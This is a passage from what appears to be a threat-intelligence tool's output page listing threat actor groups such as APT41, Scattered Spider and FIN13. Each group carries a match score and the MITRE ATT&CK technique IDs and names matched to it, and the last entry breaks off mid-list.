  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1218.009 - Regsvcs/Regasm
  • T1555.004 - Windows Credential Manager
  • T1547.013 - XDG Autostart Entries
  • T1608.006 - SEO Poisoning
  • T1027.018 - Invisible Unicode
  • T1547.008 - LSASS Driver
MITREへのリンク →

ZIRCONIUM

Score: 27.32
Matched TTPs:
  • T1685.001 - Disable or Modify Windows Event Log
  • T1566.002 - Spearphishing Link
  • T1685.002 - Disable or Modify Cloud Log
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1547.002 - Authentication Package
  • T1547.013 - XDG Autostart Entries
  • T1608.006 - SEO Poisoning
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Leviathan

Score: 44.63
Matched TTPs:
  • T1685.001 - Disable or Modify Windows Event Log
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1497.002 - User Activity Based Checks
  • T1554 - Compromise Host Software Binary
  • T1055.014 - VDSO Hijacking
  • T1157 - Dylib Hijacking
  • T1027.014 - Polymorphic Code
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1001.003 - Protocol or Service Impersonation
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1546.016 - Installer Packages
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Daggerfly

Score: 15.15
Matched TTPs:
  • T1584.008 - Network Devices
  • T1089 - Disabling Security Tools
  • T1497.002 - User Activity Based Checks
  • T1174 - Password Filter DLL
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

GALLIUM

Score: 28.77
Matched TTPs:
  • T1584.008 - Network Devices
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1059.011 - Lua
  • T1174 - Password Filter DLL
  • T1134 - Access Token Manipulation
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

FIN13

Score: 41.90
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1547.005 - Security Support Provider
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1051 - Shared Webroot
  • T1552.003 - Shell History
  • T1134.001 - Token Impersonation/Theft
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.010 - Command Obfuscation
  • T1209 - Time Providers
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1569.002 - Service Execution
MITREへのリンク →

Ke3chang

Score: 28.48
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1027.008 - Stripped Payloads
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1059.011 - Lua
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

APT41

Score: 73.52
Matched TTPs:
  • T1584.008 - Network Devices
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1574.008 - Path Interception by Search Order Hijacking
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1059.008 - Network Device CLI
  • T1497.002 - User Activity Based Checks
  • T1041 - Exfiltration Over C2 Channel
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1059.011 - Lua
  • T1027 - Obfuscated Files or Information
  • T1218.010 - Regsvr32
  • T1002 - Data Compressed
  • T1001.003 - Protocol or Service Impersonation
  • T1564.003 - Hidden Window
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1574.002 - DLL Side-Loading
  • T1548.006 - TCC Manipulation
  • T1027.007 - Dynamic API Resolution
  • T1008 - Fallback Channels
MITREへのリンク →

APT5

Score: 14.23
Matched TTPs:
  • T1584.008 - Network Devices
  • T1027.008 - Stripped Payloads
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
MITREへのリンク →

menuPass

Score: 31.38
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1174 - Password Filter DLL
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
MITREへのリンク →

Wizard Spider

Score: 43.36
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1038 - DLL Search Order Hijacking
  • T1059.009 - Cloud API
  • T1003.001 - LSASS Memory
  • T1590.006 - Network Security Appliances
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1001.003 - Protocol or Service Impersonation
  • T1556.009 - Conditional Access Policies
  • T1134 - Access Token Manipulation
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1027.018 - Invisible Unicode
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Axiom

Score: 28.50
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1140 - Deobfuscate/Decode Files or Information
  • T1177 - LSASS Driver
  • T1175 - Component Object Model and Distributed COM
  • T1049 - System Network Connections Discovery
  • T1157 - Dylib Hijacking
  • T1114.002 - Remote Email Collection
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1160 - Launch Daemon
MITREへのリンク →

HEXANE

Score: 32.46
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1547.005 - Security Support Provider
  • T1562.012 - Disable or Modify Linux Audit System
  • T1027.016 - Junk Code Insertion
  • T1590.006 - Network Security Appliances
  • T1497.002 - User Activity Based Checks
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1547.002 - Authentication Package
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

UNC3886

Score: 23.16
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1556.002 - Password Filter DLL
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32
MITREへのリンク →

LuminousMoth

Score: 18.22
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1059.009 - Cloud API
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1584.005 - Botnet
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Salt Typhoon

Score: 11.29
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1608.002 - Upload Tool
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
MITREへのリンク →

Play

Score: 16.05
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Aoqin Dragon

Score: 8.71
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1219.001 - IDE Tunneling
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
MITREへのリンク →

RedCurl

Score: 23.03
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1574.010 - Services File Permissions Weakness
  • T1059.011 - Lua
  • T1027.010 - Command Obfuscation
  • T1209 - Time Providers
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Moses Staff

Score: 10.77
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

TeamTNT

Score: 35.81
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1003.007 - Proc Filesystem
  • T1036.009 - Break Process Trees
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1586.002 - Email Accounts
  • T1558 - Steal or Forge Kerberos Tickets
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1597 - Search Closed Sources
  • T1519 - Emond
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Sidewinder

Score: 25.04
Matched TTPs:
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1657 - Financial Theft
  • T1497.002 - User Activity Based Checks
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Gallmaker

Score: 6.62
Matched TTPs:
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1497.002 - User Activity Based Checks
  • T1059.011 - Lua
MITREへのリンク →

BITTER

Score: 12.25
Matched TTPs:
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

TA505

Score: 32.40
Matched TTPs:
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1136.002 - Domain Account
  • T1138 - Application Shimming
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Malteiro

Score: 8.33
Matched TTPs:
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1562.012 - Disable or Modify Linux Audit System
  • T1552.003 - Shell History
  • T1027.010 - Command Obfuscation
MITREへのリンク →

APT12

Score: 4.68
Matched TTPs:
  • T1087.002 - Domain Account
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
MITREへのリンク →

Machete

Score: 8.60
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Elderwood

Score: 6.18
Matched TTPs:
  • T1087.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Transparent Tribe

Score: 6.81
Matched TTPs:
  • T1087.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1027.018 - Invisible Unicode
MITREへのリンク →

WIRTE

Score: 8.93
Matched TTPs:
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

RTM

Score: 10.50
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1565.002 - Transmitted Data Manipulation
  • T1059.012 - Hypervisor CLI
  • T1008 - Fallback Channels
MITREへのリンク →

APT-C-36

Score: 6.10
Matched TTPs:
  • T1087.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

CURIUM

Score: 19.53
Matched TTPs:
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1175 - Component Object Model and Distributed COM
  • T1497.002 - User Activity Based Checks
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
  • T1547.008 - LSASS Driver
MITREへのリンク →

Tropic Trooper

Score: 30.04
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1555.003 - Credentials from Web Browsers
  • T1003.001 - LSASS Memory
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1136.003 - Cloud Account
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1209 - Time Providers
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

PLATINUM

Score: 12.51
Matched TTPs:
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1684 - Social Engineering
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
  • T1686 - Disable or Modify System Firewall
MITREへのリンク →

TA551

Score: 11.87
Matched TTPs:
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1218.012 - Verclsid
  • T1027.014 - Polymorphic Code
  • T1562.011 - Spoof Security Alerting
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

FIN8

Score: 18.77
Matched TTPs:
  • T1087.002 - Domain Account
  • T1059.009 - Cloud API
  • T1027.017 - SVG Smuggling
  • T1612 - Build Image on Host
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

LazyScripter

Score: 18.62
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1136.002 - Domain Account
  • T1612 - Build Image on Host
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Higaisa

Score: 11.38
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1590.006 - Network Security Appliances
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
  • T1569.002 - Service Execution
MITREへのリンク →

Rancor

Score: 6.25
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

FIN4

Score: 9.11
Matched TTPs:
  • T1087.002 - Domain Account
  • T1574.010 - Services File Permissions Weakness
  • T1157 - Dylib Hijacking
  • T1027.010 - Command Obfuscation
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Storm-1811

Score: 21.03
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1486 - Data Encrypted for Impact
  • T1565.002 - Transmitted Data Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1547.008 - LSASS Driver
MITREへのリンク →

Inception

Score: 19.04
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1218.012 - Verclsid
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
  • T1159 - Launch Agent
MITREへのリンク →

EXOTIC LILY

Score: 14.51
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1612 - Build Image on Host
  • T1690 - Prevent Command History Logging
  • T1218.010 - Regsvr32
  • T1027.018 - Invisible Unicode
  • T1547.008 - LSASS Driver
MITREへのリンク →

Ajax Security Team

Score: 6.14
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.013 - XDG Autostart Entries
  • T1547.008 - LSASS Driver
MITREへのリンク →

Saint Bear

Score: 12.05
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1059.009 - Cloud API
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1027.018 - Invisible Unicode
MITREへのリンク →

FIN6

Score: 24.65
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1612 - Build Image on Host
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1505 - Server Software Component
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1548.006 - TCC Manipulation
  • T1027.007 - Dynamic API Resolution
  • T1547.008 - LSASS Driver
MITREへのリンク →

Whitefly

Score: 4.15
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

TA459

Score: 4.48
Matched TTPs:
  • T1087.002 - Domain Account
  • T1497.002 - User Activity Based Checks
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
MITREへのリンク →

Nomadic Octopus

Score: 4.55
Matched TTPs:
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1497.002 - User Activity Based Checks
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Gorgon Group

Score: 9.81
Matched TTPs:
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1059.009 - Cloud API
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

APT19

Score: 13.55
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1059.009 - Cloud API
  • T1590.006 - Network Security Appliances
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

TA2541

Score: 19.02
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1684 - Social Engineering
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

SideCopy

Score: 16.85
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1590.006 - Network Security Appliances
  • T1218.012 - Verclsid
  • T1657 - Financial Theft
  • T1027.010 - Command Obfuscation
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Tonto Team

Score: 12.85
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Andariel

Score: 14.16
Matched TTPs:
  • T1087.002 - Domain Account
  • T1136.002 - Domain Account
  • T1187 - Forced Authentication
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Naikon

Score: 7.30
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
MITREへのリンク →

Molerats

Score: 12.03
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1059.010 - AutoHotKey & AutoIT
  • T1562.012 - Disable or Modify Linux Audit System
  • T1497.002 - User Activity Based Checks
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

admin@338

Score: 7.57
Matched TTPs:
  • T1087.002 - Domain Account
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1218.010 - Regsvr32
MITREへのリンク →

Darkhotel

Score: 16.73
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.009 - Safe Mode Boot
  • T1059.010 - AutoHotKey & AutoIT
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1564.002 - Hidden Users
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

IndigoZebra

Score: 4.43
Matched TTPs:
  • T1087.002 - Domain Account
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

APT33

Score: 16.22
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1027.016 - Junk Code Insertion
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Confucius

Score: 12.27
Matched TTPs:
  • T1087.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1218.010 - Regsvr32
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

BlackTech

Score: 9.46
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1209 - Time Providers
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Windshift

Score: 15.84
Matched TTPs:
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.011 - Lua
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1547.008 - LSASS Driver
MITREへのリンク →

Scattered Spider

Score: 65.69
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1566.002 - Spearphishing Link
  • T1583.001 - Domains
  • T1547.005 - Security Support Provider
  • T1019 - System Firmware
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1051 - Shared Webroot
  • T1552.003 - Shell History
  • T1218.005 - Mshta
  • T1619 - Cloud Storage Object Discovery
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1090.004 - Domain Fronting
  • T1564.003 - Hidden Window
  • T1565.002 - Transmitted Data Manipulation
  • T1134 - Access Token Manipulation
  • T1027.002 - Software Packing
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
MITREへのリンク →

Storm-0501

Score: 31.06
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1140 - Deobfuscate/Decode Files or Information
  • T1574.008 - Path Interception by Search Order Hijacking
  • T1552.003 - Shell History
  • T1218.005 - Mshta
  • T1497.002 - User Activity Based Checks
  • T1097 - Pass the Ticket
  • T1027 - Obfuscated Files or Information
  • T1027.014 - Polymorphic Code
  • T1090.004 - Domain Fronting
  • T1565.002 - Transmitted Data Manipulation
MITREへのリンク →

Silent Librarian

Score: 11.32
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1027.016 - Junk Code Insertion
  • T1584.005 - Botnet
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
MITREへのリンク →

Chimera

Score: 33.49
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1027.016 - Junk Code Insertion
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1574 - Hijack Execution Flow
  • T1059.003 - Windows Command Shell
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Cinnamon Tempest

Score: 17.11
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1574.008 - Path Interception by Search Order Hijacking
  • T1045 - Software Packing
  • T1552.003 - Shell History
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Velvet Ant

Score: 22.53
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1036.009 - Break Process Trees
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1219.001 - IDE Tunneling
  • T1597 - Search Closed Sources
  • T1027.007 - Dynamic API Resolution
  • T1569.002 - Service Execution
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

Aquatic Panda

Score: 15.52
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1059.009 - Cloud API
  • T1136.002 - Domain Account
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

APT3

Score: 26.99
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
